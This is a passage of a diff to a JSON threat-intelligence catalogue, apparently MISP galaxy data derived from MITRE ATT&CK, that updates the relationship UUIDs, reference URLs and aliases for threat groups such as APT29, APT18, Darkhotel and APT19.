"830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "17862c7d-9e60-48a0-b48e-da4dc4c3f6b0", @@ -5692,8 +6714,8 @@ "refs": [ "https://attack.mitre.org/groups/G0008", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf", - "https://www.fox-it.com/en/about-fox-it/corporate/news/anunak-aka-carbanak-update/", "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://www.fox-it.com/en/about-fox-it/corporate/news/anunak-aka-carbanak-update/", "https://www.crowdstrike.com/blog/state-criminal-address/" ], "synonyms": [ 
@@ -5731,6 +6753,13 @@ ], "type": "uses" }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", "tags": [ @@ -5738,20 +6767,6 @@ ], "type": "uses" }, - { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -5760,7 +6775,14 @@ "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5a63f900-5e7e-4928-a746-dd4558e1df71", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5774,7 +6796,7 @@ "type": "uses" }, { - "dest-uuid": "72f54d66-675d-4587-9bd3-4ed09f9522e4", + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5788,7 +6810,7 @@ "type": "uses" }, { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -5953,14 +6975,14 @@ "type": "uses" }, { - "dest-uuid": "9108e212-1c94-4f8d-be76-1aad9b4c86a4", + "dest-uuid": "271e6d40-e191-421a-8f87-a8102452c201", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "271e6d40-e191-421a-8f87-a8102452c201", + "dest-uuid": "9108e212-1c94-4f8d-be76-1aad9b4c86a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -5984,7 +7006,8 @@ "refs": [ "https://attack.mitre.org/groups/G0026", "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/", - "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop" + "https://www.threatstream.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop" ], "synonyms": [ "APT18", @@ -6022,6 +7045,13 @@ ], "type": "uses" }, + { + "dest-uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ @@ -6037,7 +7067,21 @@ "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6050,20 +7094,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e066bf86-9cfb-407a-9d25-26fd5d91e360", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "88c621a7-aef9-4ae0-94e3-1fc87123eb24", "tags": [ 
@@ -6071,12 +7101,61 @@ ], "type": "uses" }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9e2bba94-950b-4fcf-8070-cb3f816c5f4e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "38fd6a28-3353-4f2b-bb2b-459fecd5c648", 
@@ -6089,11 +7168,14 @@ "refs": [ "https://attack.mitre.org/groups/G0016", "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/" ], "synonyms": [ "APT29", + "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke" @@ -6114,13 +7196,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ 
@@ -6128,41 +7203,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "65370d0b-3bd4-4653-8cf9-daf56f6be830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ @@ -6171,7 +7211,21 @@ "type": "uses" }, { - "dest-uuid": "1ce03c65-5946-4ac9-9d4d-66db87e024bd", + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6184,6 +7238,20 @@ ], "type": "uses" }, + { + "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "65370d0b-3bd4-4653-8cf9-daf56f6be830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "ae9d818d-95d0-41da-b045-9cabea1ca164", "tags": [ 
@@ -6191,20 +7259,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b136d088-a829-432c-ac26-5529c26d4c7e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ @@ -6213,7 +7267,7 @@ "type": "uses" }, { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6226,6 +7280,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6ef745b-077f-42e1-a37d-29eecff9c754", "tags": [ @@ -6233,6 +7294,13 @@ ], "type": "uses" }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cbf646f1-7db5-4dc6-808b-0094313949df", "tags": [ @@ -6240,6 +7308,13 @@ ], "type": "uses" }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "00c3bfcb-99bd-4767-8c03-b08f585f5c8a", "tags": [ 
@@ -6248,42 +7323,7 @@ "type": "uses" }, { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2daa14d6-cbf3-4308-bb8e-213c324a08e4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2eb9b131-d333-4a48-9eb4-d8dec46c19ee", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "67e6d66b-1b82-4699-b47a-e2efb6268d14", + "dest-uuid": "1ce03c65-5946-4ac9-9d4d-66db87e024bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6297,28 +7337,7 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -6331,12 +7350,117 @@ ], "type": "uses" }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2eb9b131-d333-4a48-9eb4-d8dec46c19ee", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2daa14d6-cbf3-4308-bb8e-213c324a08e4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "5e595477-2e78-4ce7-ae42-e0b059b17808", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b136d088-a829-432c-ac26-5529c26d4c7e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + 
}, + { + "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "67e6d66b-1b82-4699-b47a-e2efb6268d14", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "899ce53f-13a0-479b-a0e4-67d46e241542", @@ -6348,7 +7472,7 @@ "external_id": "G0012", "refs": [ "https://attack.mitre.org/groups/G0012", - "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf" ], "synonyms": [ "Darkhotel" @@ -6369,13 +7493,6 @@ ], "type": "uses" }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ 
@@ -6389,6 +7506,90 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "9e729a7e-0dd6-4097-95bf-db8d64911383", @@ -6484,27 +7685,6 @@ ], "type": "uses" }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "123bd7b3-675c-4b1a-8482-c55782b20e2b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ @@ -6513,35 +7693,7 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6554,13 +7706,6 @@ ], "type": "uses" }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "294e2560-bd48-44b2-9da2-833b5588ad11", "tags": [ 
@@ -6576,7 +7721,14 @@ "type": "uses" }, { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "dest-uuid": "4664b683-f578-434f-919b-1c1aad2a1111", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "123bd7b3-675c-4b1a-8482-c55782b20e2b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6588,6 +7740,55 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "16ade1aa-0ea1-4bb7-88cc-9079df2ae756", 
@@ -6601,8 +7802,8 @@ "https://attack.mitre.org/groups/G0073", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/", - "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", "https://www.fireeye.com/current-threats/apt-groups.html#apt19", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", "https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059" ], "synonyms": [ @@ -6614,20 +7815,6 @@ ] }, "related": [ - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -6635,20 +7822,6 @@ ], "type": "uses" }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ @@ -6656,13 +7829,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", "tags": [ 
@@ -6670,13 +7836,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -6684,27 +7843,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ @@ -6712,13 +7850,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ 
@@ -6734,7 +7865,77 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -6748,7 +7949,14 @@ "type": "uses" }, { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6789,14 +7997,14 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -6858,34 +8066,6 @@ ], "type": "uses" }, - { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", - "tags": [ - 